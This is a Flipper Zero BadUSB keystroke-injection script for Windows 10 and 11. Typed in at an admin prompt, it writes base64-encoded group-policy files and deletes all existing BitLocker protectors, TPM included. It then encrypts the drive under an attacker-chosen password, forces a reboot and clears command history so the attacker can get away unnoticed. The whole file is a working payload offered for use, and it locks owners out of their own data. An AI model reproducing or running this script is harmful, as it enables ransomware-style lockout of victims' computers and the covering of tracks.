Flipper/BadUSB/emptythevoid-BadUSB/bitlocker/bitlocker_encrypt_password.txt

162 lines
6.4 KiB
Plaintext
Raw Normal View History

2024-09-06 20:27:37 +00:00
REM Enable Bitlocker encryption with a user-supplied password
REM and optionally reboot the computer immediately
REM Author: emptythevoid
REM Target: Windows 10, 11
REM MORE RESEARCH REQUIRED
REM ==INFO========================================================================================
REM If the drive is already encrypted with a protector (lke TPM)
REM it will delete all protectors and substitute our own new password
REM without needing to re-encrypt.
REM If the drive doesn't have bitlocker enabled, it will do so with the new password
REM and take effect on next reboot (which you can optionally enable at the end)
REM Note #1: This will likely fail if the drive is currently in the process of encryption.
REM Note #2 If the target computer is a tablet (aka "slab"), Windows will disallow
REM preboot authentication options that might require a keyboard. To override this,
REM you have to set a local group policy. This might be possible to do by editing the
REM registry directly, but since Windows specifically complains about Group Policy,
REM I've encoded a Registry.pol below that you can optionally deploy.
REM It will create a file in C:\Windows\System32\GroupPolicy\Machine
REM which should take effect immediately.
REM This Registry.pol enables these two policy values:
REM Computer Configuration\Administrative Templates\Windows Components\Bitlocker Drive Encryption\Operating System Drives\ Enable use of Bitlocker authentication requiring preboot keyboard input on slates
REM Computer Configuration > Administrative Templates > Windows Components > Bitlocker Drive Encryption > Operating System Drives > Open the key Require additional authentication at startup
REM ==Launch command prompt as Admin using GUI + X ===============================================
REM ==NOTE that this brings up a Powershell window, not cmd.exe===================================
REM ==This method may be more reliable since GUI r can sometimes lose focus on open===============
GUI x
DELAY 200
STRING A
DELAY 1000
ALT y
DELAY 3000
REM ==Optional - local group policy to allow password protection on tablets========================
REM ==Simply copying the registry.pol file is not sufficient.
REM STRING $folderpath = [Environment]::GetFolderPath("C:\Windows\System32\GroupPolicy\Machine");
REM STRING $filename = $folderpath+"\Registry.pol";
STRING mkdir C:\windows\system32\grouppolicy\machine
DELAY 100
ENTER
DELAY 100
STRING $filename = "C:\Windows\System32\GroupPolicy\Machine\Registry.pol";
STRING $b64="UFJlZwEAAABbAFMAbwBmAHQAdwBhAHIAZQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwA
STRING RgBWAEUAAAA7AE8AUwBFAG4AYQBiAGwAZQBQAHIAZQBiAG8AbwB0AEkAbgBwAHUAdABQAHIAbwB0AGUAYwB0AG8AcgBzAE8AbgB
STRING TAGwAYQB0AGUAcwAAADsABAAAADsABAAAADsAAQAAAF0AWwBTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAY
STRING wByAG8AcwBvAGYAdABcAEYAVgBFAAAAOwBVAHMAZQBBAGQAdgBhAG4AYwBlAGQAUwB0AGEAcgB0AHUAcAAAADsABAAAADsABAAAADsAAQAAA
STRING F0AWwBTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAEYAVgBFAAAAOwBFAG4AYQBiAGwAZQ
STRING BCAEQARQBXAGkAdABoAE4AbwBUAFAATQAAADsABAAAADsABAAAADsAAQAAAF0AWwBTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAG
STRING kAYwByAG8AcwBvAGYAdABcAEYAVgBFAAAAOwBVAHMAZQBUAFAATQAAADsABAAAADsABAAAADsAAgAAAF0AWwBTAG8AZgB0AHcAYQByAGUAXABQAG8
STRING AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAEYAVgBFAAAAOwBVAHMAZQBUAFAATQBQAEkATgAAADsABAAAADsABAAAADsAAgAAAF0
STRING AWwBTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAEYAVgBFAAAAOwBVAHMAZQBUAFAATQBLAGU
STRING AeQAAADsABAAAADsABAAAADsAAgAAAF0AWwBTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAEY
STRING AVgBFAAAAOwBVAHMAZQBUAFAATQBLAGUAeQBQAEkATgAAADsABAAAADsABAAAADsAAgAAAF0A";
STRING $bytes = [Convert]::FromBase64String($b64);
STRING [IO.File]::WriteAllBytes($filename, $bytes);
DELAY 300
REM Create the GPT file. This is definitely required, but I don't know if it changes per machine
STRING $filename = "C:\Windows\System32\GroupPolicy\gpt.ini";
STRING $b64="W0dlbmVyYWxdDQpnUENNYWNoaW5lRXh0ZW5zaW9uTmFtZXM9W3szNTM3OEVBQy02ODNGLTExRDItQTg5
STRING QS0wMEMwNEZCQkNGQTJ9e0QwMkIxRjcyLTM0MDctNDhBRS1CQTg4LUU4MjEzQzY3NjFGMX1dIA0KVmVyc2lvbj01DQo=";
STRING $bytes = [Convert]::FromBase64String($b64);
STRING [IO.File]::WriteAllBytes($filename, $bytes);
DELAY 300
REM have to gpupdate. This will take an undetermined amount of time
REM you may need to set this to trigger on a button press rather than a delay
STRING gpupdate /force
ENTER
DELAY 10000
REM ==Remove existing keys, in case bitlocker is already enabled==================================
STRING manage-bde -protectors -delete C:
ENTER
DELAY 1000
REM ==Clear out from messages, in case no protectors, just in case================================
ENTER
DELAY 2000
REM ==Enable bitlocker on C: with password and skip hardware test=================================
STRING manage-bde -on C: -skiphardwaretest
ENTER
DELAY 500
REM ==remove default TPM. We don't want this enabled.=============================================
STRING manage-bde -protectors -delete C:
ENTER
DELAY 1000
REM ==Manually add password as a protector. SET YOUR PASSWORD HERE!!==============================
REM ==MUST BE AT LEAST 8 CHARACTERS LONG OR ELSE IT WILL FAIL=====================================
DELAY 1000
STRING manage-bde -protectors -add C: -password
ENTER
DELAY 1000
STRING yourpasswordhere
ENTER
DELAY 1000
STRING yourpasswordhere
ENTER
DELAY 3000
REM ==Force the protection to be enabled so that it engages at next reboot========================
STRING manage-bde -Protectors -Enable C:
ENTER
DELAY 2000
REM ==Optional - Reboot after a delay. Give you time to escape====================================
STRING shutdown /r /t 30
ENTER
DELAY 2000
ENTER
DELAY 500
REM ==Clear history of Windows Terminal====================================
ALT F7
DELAY 200
REM ==Enable this if you are doing a delayed reboot using traditional command prompt========================
REM ALT F4
REM ==Enable this if you are doing a delayed reboot using GUI x prompt======================================
STRING exit
ENTER
REM ==Optional - Clear run history - not needed if using GUI +X ===================================
REM GUI r
REM DELAY 500
REM STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
REM ENTER
REM DELAY 300
REM ==Optional - reboot immediately to lock the computer==========================================
REM STRING shutdown /r /t 0
REM ENTER